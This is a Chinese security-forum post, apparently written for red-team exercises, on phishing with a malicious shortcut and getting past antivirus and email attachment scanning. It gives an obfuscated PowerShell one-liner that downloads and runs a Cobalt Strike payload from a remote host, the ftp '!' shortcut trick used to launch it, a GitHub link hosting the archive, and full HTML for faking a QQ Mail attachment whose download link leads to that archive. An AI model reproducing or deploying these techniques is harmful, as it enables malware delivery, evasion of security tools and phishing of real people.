问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
【HVV2022】邮件钓鱼bypass附件检测&&杀软一把梭
漏洞分析
某护也快开始了,希望能够提供一些借鉴意义
0x01 前言 ======= 先申明利益相关方,本文章仅为思路分享,品牌关键处会打码处理,不过确实挺有意思的,某护也快开始了,希望能够提供一些借鉴意义。 0x02 ByPass AV ============== 将恶意文件,上传到github项目 ```php https://github.com/punch0day/cs_test ``` ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-1da1fd8eae3deb3423c4850f5120d134ac522003.png) 有经验的师傅,一眼就可以看出,这是Link钓鱼 但是某压缩包是检测为安全的 ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-0b72d9c16bcaedb9adc4a579d0d86a462e8d5119.png) ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-9fe0fa41ff7f2a5fcadb6153864f1a0bb9b71561.png) VirusTotal全球57家厂商,只有1家能够检测出来,过国内所有杀软不在话下,篇幅原因,powershell混淆技巧不细讲,师傅们可以先关注我,留作下次分享 **源码如下:** ```php aaa.dll #ftp快捷方式运行时,会加载此dll !cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\\bbb.ps1 ``` ```php bbb.ps1 #cs上线 powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/19'+'2.16'+'8.20'+'6.1'+'32:8'+'0/a'))".Replace("##","")) ``` (ps:可过所有静态查杀,动态的查杀看情况,像360杀毒(非卫士),win defender可过,国内某些杀软一调用powershell进程就报可疑) ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-e660d5ab61b3fd2d67cd8e9aba1ff786c4a9e076.png) 快捷方式改为以上这样就行了,原理上是利用了ftp命令模式下,输入!会命令执行,**这个是其他师傅的方法,非原创,但是bypass是自己做的** ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-f766f3498fbf81be2225187409c7bcc85ae9d62c.png) 只要一打开快捷键,立马cs上线 ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-5d11cb9b66d3ba09f6c2457848d7a8bff76b0e99.png) ```php 参考文献: 【2022HVV系列】|9\-红蓝对抗之钓鱼篇:常见钓鱼思路总结 https://www.77169.net/html/291698.html PowerShell攻击的混淆方法总结 http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_3320.html ``` 0x03 ByPass 邮箱附件检测 ================== 上传到github上后,选择将code下载为zip格式,下载到本地后,找到游览器的历史下载记录,并复制下载链接 ```php https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main ``` 打开某邮箱,找到一个带有附件的邮件 ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-b10fa3b47d95b3f7333fc33c990bb883548de70a.png) 复制附件的html代码 ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-27aa7b3db33af82d768f2246fed305920799e107.png) 发送邮件,进行测试,选择“格式”插入html,粘贴html代码 ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-35caafddca80474a12b08fdece3f4a87106cd90c.png) 找到“下载”的<a>标签 进行修改 改为<a href=”刚才github的下载链接”> **整个payload如下:** ```php <div id="qm_con_body"><div id="mailContentContainer" class="qmbox qm_con_body_content qqmail_webmail_only" style="opacity: 1;"><div id="attachment" a="" b="false" style="padding:2px;" class="attbg" ui-type="attCon"><div style="padding:6px 10px 10px 8px;" class="txt_left"><div style="height:14px;"> <b style="font-size:14px;"><img src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gif" align="absmiddle" class="ico_att showattch" border="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)</div></div><div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;"><div class="graytext clear" style="padding-top:12px; padding-bottom:5px"><span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span> <span id="span_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span> </div><div class="att_bt attachitem"><div class="ico_big"><a id="AttachIconAZL0012_1yrN1r~M_twu3KkAAIjVLc50" attach="1" attid="请重点关注.docx" viewmode="doc" url="/cgi-bin/viewdocument?sid=lGnwl-6PmrgMcwZk&filename=1.docx&mailid=1&retry=true&t=attachments_content&ef=qfunc&s=yozo&fromattach=1" ck="previewAttach2" idx="0" filename="请重点关注.docx" down="/cgi-bin/download?mailid=1&filename=1.doc" iconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif" filebyte="15360" sparse2onlinedocurl=""><img style="width:auto;" src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif"></a></div><div class="name_big"> <span player="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">请重点关注.docx</span><span class="graytext"> (15K<span id="span_attachIndex_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_cd690305b12fa8de1acdd0ee2fc76181" style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开 </span></span>)</span><div class="down_big"><a ck="previewAttach" select="1" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=1&filename=1.docx&sid=1">预览</a> <a href="https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main">下载</a> <a style="" flag="0" class="needSetFlag" attachkey="1|1.docx|1.docx|15360"><span>收藏</span></a><span style="display:none;" class="graytext"><span>已收藏, </span><a>查看</a></span> <a ui-type="netdiskBind" attid="1|1|1" class="netdisk_hide"><span>转存</span><span class="bind_down_icon"></span></a></div></div></div></div></div></div></div> ``` ![图片](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-53cd6494e4be42059e73c62b156a075195a7c33f.png) **亲测可行,不管是企业邮箱,个人邮箱,桌面端,移动端,全部都是本地直接下载,附件不会经过邮箱的任何安全检测,直接bypass!**
发表于 2022-07-01 09:42:56
阅读 ( 8072 )
分类:
漏洞分析
6 推荐
收藏
3 条评论
pokeroot
2022-07-01 12:04
ps:可以过静态(360杀毒),动态(安全卫士)和沙箱不行,只是给大家提供一些思路,个人公众号:韬光养晦安全。
请先
登录
后评论
用户不存在(已注销)
2022-07-02 21:30
dlddw
请先
登录
后评论
狗哥
2022-07-19 10:04
学习了
请先
登录
后评论
请先
登录
后评论
pokeroot
6 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!